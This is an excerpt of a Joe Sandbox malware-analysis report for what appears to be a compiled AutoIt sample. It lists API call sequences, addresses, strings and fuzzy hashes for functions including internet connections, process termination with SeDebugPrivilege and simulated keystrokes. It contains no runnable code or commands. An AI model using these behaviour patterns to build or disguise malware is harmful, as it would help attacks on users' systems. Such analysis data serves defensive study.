                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 9d946d809d1211506e8630a79fb340ce3aa6403ca50c0cd5666e66f4e874af28
                                                        • Instruction ID: 0fcc1a91ba823b494cf5f5161e218398c3f9b054f3a7a19969b702c6af3bbf1b
                                                        • Opcode Fuzzy Hash: 9d946d809d1211506e8630a79fb340ce3aa6403ca50c0cd5666e66f4e874af28
                                                        • Instruction Fuzzy Hash: 05D18E71702222CFDB19EF15C9A9A69F7A7BF06700F1442ADE44AAB251CB30ED52CF54
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 006A5C7A
                                                          • Part of subcall function 006A5D0A: GetClientRect.USER32(?,?), ref: 006A5D30
                                                          • Part of subcall function 006A5D0A: GetWindowRect.USER32(?,?), ref: 006A5D71
                                                          • Part of subcall function 006A5D0A: ScreenToClient.USER32(?,?), ref: 006A5D99
                                                        • GetDC.USER32 ref: 006E46F5
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006E4708
                                                        • SelectObject.GDI32(00000000,00000000), ref: 006E4716
                                                        • SelectObject.GDI32(00000000,00000000), ref: 006E472B
                                                        • ReleaseDC.USER32(?,00000000), ref: 006E4733
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006E47C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 512fbc915a7322a96d65c21b812269f718e23596ff8565475da9bf4ab28a92d7
                                                        • Instruction ID: c22b05684d697f7fe04141d7f5569891b7ff2ede4b07c546cf9655bea53542b1
                                                        • Opcode Fuzzy Hash: 512fbc915a7322a96d65c21b812269f718e23596ff8565475da9bf4ab28a92d7
                                                        • Instruction Fuzzy Hash: 9B71CD30401345DFCF21DF74C984AEA7BB2FF4A361F144269E9565A2AACB319C82DF90
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007135E4
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • LoadStringW.USER32(00772390,?,00000FFF,?), ref: 0071360A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LoadString$_wcslen
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 4099089115-2391861430
                                                        • Opcode ID: 10e15a3f1b16b2f89fcf4c3589b9e25a02a5e86f6ddbe5fe4742f83b268edc87
                                                        • Instruction ID: be7bf439f065b4c640ec8e08fa4edfdf51c871f74ca5afa7acb7289665bcfbd6
                                                        • Opcode Fuzzy Hash: 10e15a3f1b16b2f89fcf4c3589b9e25a02a5e86f6ddbe5fe4742f83b268edc87
                                                        • Instruction Fuzzy Hash: 96518FB1800219EADF15FBA4CC42EEEBB75AF05340F544129F505721A2EB392F98DFA4
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071C272
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0071C29A
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0071C2CA
                                                        • GetLastError.KERNEL32 ref: 0071C322
                                                        • SetEvent.KERNEL32(?), ref: 0071C336
                                                        • InternetCloseHandle.WININET(00000000), ref: 0071C341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 86f8d5355da47556c05b85840b0d647799e2a4829a9f64e2ad0bbc3c5c204e5d
                                                        • Instruction ID: 6559f531024e42978254b67b2c239eca9e29991b874c7bc24e16382bc1094b9b
                                                        • Opcode Fuzzy Hash: 86f8d5355da47556c05b85840b0d647799e2a4829a9f64e2ad0bbc3c5c204e5d
                                                        • Instruction Fuzzy Hash: 673180B1540204AFE7239FA9CC88AEB7BFCEB49744F14851DF456E2280DB38DD849B65
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006E3AAF,?,?,Bad directive syntax error,0073CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007098BC
                                                        • LoadStringW.USER32(00000000,?,006E3AAF,?), ref: 007098C3
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00709987
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 858772685-4153970271
                                                        • Opcode ID: afc04908c6c40bffb50b17e4f21532f6af190008052a0b3ec2f678626d951249
                                                        • Instruction ID: 644f0d99014f300660f22fb862e2a3b1ee7608d21894a3d3f5b3b8494a584c98
                                                        • Opcode Fuzzy Hash: afc04908c6c40bffb50b17e4f21532f6af190008052a0b3ec2f678626d951249
                                                        • Instruction Fuzzy Hash: 0721B471800229EBDF56AF90CC06EED7776FF15300F044419F515610A2EB39AA18DF64
                                                        APIs
                                                        • GetParent.USER32 ref: 007020AB
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 007020C0
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0070214D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1290815626-3381328864
                                                        • Opcode ID: cb3dd148be3a2d1e2d9393882f92fe4bcf8eaffb1fe7f836ede81ef0a58cf22b
                                                        • Instruction ID: 0e5e920af8b72ea89eb3d96b20863d65e4089beea5e58a1b8eafce7c2a13a083
                                                        • Opcode Fuzzy Hash: cb3dd148be3a2d1e2d9393882f92fe4bcf8eaffb1fe7f836ede81ef0a58cf22b
                                                        • Instruction Fuzzy Hash: 7611E3B768870AF9FA156724DC0FDB677DCCB05324F20021AFA09A50D2FEAD68436618
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                        • String ID:
                                                        • API String ID: 1282221369-0
                                                        • Opcode ID: 10b15114fff348b7862816be07967d6fb468459281feb4630e3514d2dcf8b1ea
                                                        • Instruction ID: 4c652a9834890ed6955a9da9e7a706e8e5f392c5ea3da29b377eee0bc58fdc36
                                                        • Opcode Fuzzy Hash: 10b15114fff348b7862816be07967d6fb468459281feb4630e3514d2dcf8b1ea
                                                        • Instruction Fuzzy Hash: 726155B1E0430AAFDB31AFB89891AEA7BA7EF05360F04416FF9049B381D6359D01D794
                                                        APIs
                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00735186
                                                        • ShowWindow.USER32(?,00000000), ref: 007351C7
                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 007351CD
                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 007351D1
                                                          • Part of subcall function 00736FBA: DeleteObject.GDI32(00000000), ref: 00736FE6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0073520D
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0073521A
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0073524D
                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00735287
                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00735296
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                        • String ID:
                                                        • API String ID: 3210457359-0
                                                        • Opcode ID: 807356175d1c317a0dfa3ea2f294dbb328e8d8abccb4d1c98db517c2dac6054e
                                                        • Instruction ID: ba082daa7b8815fec85cbb18ea5d958a72560494d5d0424c1c37df6d6eb97576
                                                        • Opcode Fuzzy Hash: 807356175d1c317a0dfa3ea2f294dbb328e8d8abccb4d1c98db517c2dac6054e
                                                        • Instruction Fuzzy Hash: DA519FB0A40A0CFEFF209F28CC4ABD93BA5BB05361F148111FA15962E2C77DA990DB41
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006F6890
                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006F68A9
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006F68B9
                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006F68D1
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006F68F2
                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006B8874,00000000,00000000,00000000,000000FF,00000000), ref: 006F6901
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006F691E
                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006B8874,00000000,00000000,00000000,000000FF,00000000), ref: 006F692D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                        • String ID:
                                                        • API String ID: 1268354404-0
                                                        • Opcode ID: 21e0632b76b7af677b7fe89d124d513be1d3380bbe24bf65551fd8cd22cd5a28
                                                        • Instruction ID: bba1db82c3bd76affe1b14ab5b36dc21a6e1a477601148fccfe895481a6df5c9
                                                        • Opcode Fuzzy Hash: 21e0632b76b7af677b7fe89d124d513be1d3380bbe24bf65551fd8cd22cd5a28
                                                        • Instruction Fuzzy Hash: E2517CB0600209EFDB20CF28CC55FEA7BBAFB54750F108518FA56A72A0DB74E991DB54
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0071C182
                                                        • GetLastError.KERNEL32 ref: 0071C195
                                                        • SetEvent.KERNEL32(?), ref: 0071C1A9
                                                          • Part of subcall function 0071C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071C272
                                                          • Part of subcall function 0071C253: GetLastError.KERNEL32 ref: 0071C322
                                                          • Part of subcall function 0071C253: SetEvent.KERNEL32(?), ref: 0071C336
                                                          • Part of subcall function 0071C253: InternetCloseHandle.WININET(00000000), ref: 0071C341
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 337547030-0
                                                        • Opcode ID: cfcce74d80790283386f86c1b43ee4b7b5807260ae73d4804deefc63a00fbf28
                                                        • Instruction ID: c98105f0a032b7c1509cfe44425f76bb7a3aecc378138c9263674867e96ba227
                                                        • Opcode Fuzzy Hash: cfcce74d80790283386f86c1b43ee4b7b5807260ae73d4804deefc63a00fbf28
                                                        • Instruction Fuzzy Hash: A131A171280605FFDB229FE9DC08AABBBF8FF18301B04841DF95696650C739E854EB60
                                                        APIs
                                                          • Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
                                                          • Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
                                                          • Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007025BD
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007025DB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007025DF
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007025E9
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00702601
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00702605
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0070260F
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00702623
                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00702627
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: 2747f31ce07b262d645feec44f8d86326b66ef054f3e1d43f121ece7ee439f5f
                                                        • Instruction ID: 80e536fd6f987216c85067f47560be7cae3d69f282c02d3d04ab7a66e8591247
                                                        • Opcode Fuzzy Hash: 2747f31ce07b262d645feec44f8d86326b66ef054f3e1d43f121ece7ee439f5f
                                                        • Instruction Fuzzy Hash: 0601D471390214FBFB1067689C8FF593F99DB4EB12F104041F318BE1D1C9EA28459A6D
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00701449,?,?,00000000), ref: 0070180C
                                                        • HeapAlloc.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 00701813
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00701449,?,?,00000000), ref: 00701828
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00701449,?,?,00000000), ref: 00701830
                                                        • DuplicateHandle.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 00701833
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00701449,?,?,00000000), ref: 00701843
                                                        • GetCurrentProcess.KERNEL32(00701449,00000000,?,00701449,?,?,00000000), ref: 0070184B
                                                        • DuplicateHandle.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 0070184E
                                                        • CreateThread.KERNEL32(00000000,00000000,00701874,00000000,00000000,00000000), ref: 00701868
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 31f612eb8b1474b28fb1fab3494bca63557e7b71dd44d12f4a2cb41eed22cc61
                                                        • Instruction ID: fd5595887c1c65e50484738cc03c983366734f66792c93b63480ba7debaf8736
                                                        • Opcode Fuzzy Hash: 31f612eb8b1474b28fb1fab3494bca63557e7b71dd44d12f4a2cb41eed22cc61
                                                        • Instruction Fuzzy Hash: 1301A8B5240308BFF611ABA5DC4AF6B3BACEB89B11F418411FA05EB1A1CA7498109B24
                                                        APIs
                                                          • Part of subcall function 0070D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0070D501
                                                          • Part of subcall function 0070D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0070D50F
                                                          • Part of subcall function 0070D4DC: CloseHandle.KERNEL32(00000000), ref: 0070D5DC
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072A16D
                                                        • GetLastError.KERNEL32 ref: 0072A180
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072A1B3
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0072A268
                                                        • GetLastError.KERNEL32(00000000), ref: 0072A273
                                                        • CloseHandle.KERNEL32(00000000), ref: 0072A2C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 4a2310436393e6ffd0bb8eb55e08dc97d2f6bcd32883f618b4df7fa56964b356
                                                        • Instruction ID: e7c9d1da8b9dfdc674ac521ec4b0b57778e8cd753dbcbf8bfa8b91acb2d8fc3e
                                                        • Opcode Fuzzy Hash: 4a2310436393e6ffd0bb8eb55e08dc97d2f6bcd32883f618b4df7fa56964b356
                                                        • Instruction Fuzzy Hash: 56619D71204252EFD720DF18D894F15BBE1AF84318F18849CE4668B7A3C77AEC45CB96
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00733925
                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0073393A
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00733954
                                                        • _wcslen.LIBCMT ref: 00733999
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007339C6
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007339F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcslen
                                                        • String ID: SysListView32
                                                        • API String ID: 2147712094-78025650
                                                        • Opcode ID: 379a2d54a08924458e048856163053defc2a8d8410610b2bee7024368f8e8c27
                                                        • Instruction ID: bdb029c2347e80aa6162bfe96e142aaa74afeb96ea40b181d30af296462ac3de
                                                        • Opcode Fuzzy Hash: 379a2d54a08924458e048856163053defc2a8d8410610b2bee7024368f8e8c27
                                                        • Instruction Fuzzy Hash: 4541A271A00318EBEB219F64CC49FEA77A9EF08354F10456AF958E7282D7799D80CB94
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 006C2D4B
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 006C2D53
                                                        • _ValidateLocalCookies.LIBCMT ref: 006C2DE1
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 006C2E0C
                                                        • _ValidateLocalCookies.LIBCMT ref: 006C2E61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
